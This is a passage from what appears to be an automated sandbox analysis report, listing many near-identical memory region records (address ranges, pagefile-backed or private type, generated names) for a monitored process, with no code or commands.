filename = "" Region: id = 11958 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11959 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11960 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11961 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11962 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11963 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 11964 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 11965 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11966 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11967 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11968 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11969 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11970 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11971 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11972 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11973 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11974 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11975 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11976 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11977 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11978 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11979 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11980 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11981 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11982 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11983 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11984 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11985 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11986 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11987 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11988 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11989 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11990 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11991 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11992 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11993 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11994 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11995 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11996 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11997 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11998 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11999 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12000 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12001 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12002 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12003 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12004 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12005 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12006 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12007 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12008 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12009 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12010 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 12011 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 12012 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12013 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12014 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 12015 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 12016 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12017 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12018 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12019 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 12020 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 12021 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12022 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12023 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12024 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12025 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12026 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12027 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12028 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12029 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12030 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12031 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12032 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12033 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12034 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12035 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12036 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12037 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12038 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12039 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12040 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12041 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12042 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12043 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12044 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12045 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12046 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12047 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12048 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12049 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12050 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12051 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12052 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12053 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12054 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12055 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12056 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12057 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12058 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12059 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12060 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12061 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12062 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12063 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12064 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12065 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12066 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12067 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12068 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12069 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12070 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12071 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12072 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12073 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12074 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12075 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12076 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12077 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12078 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12079 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12080 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12081 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12082 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12083 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12084 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12085 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12086 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12087 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12088 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12089 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12090 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12091 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12092 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12093 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 12094 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 12095 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12096 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12097 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12098 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12099 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12100 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12101 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12102 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12103 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12104 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12105 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12106 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12107 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12108 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12109 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12110 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12111 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12112 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12113 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12114 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12115 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12116 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12117 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12118 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12119 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12120 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12121 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12122 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12123 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12124 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12125 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12126 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12127 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 12128 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 12129 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12130 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12131 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 12132 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 12133 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12134 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12135 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12136 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12137 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12138 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12139 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12140 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12141 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12142 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12143 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12144 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12145 start_va = 0x530000 end_va = 0x53dfff 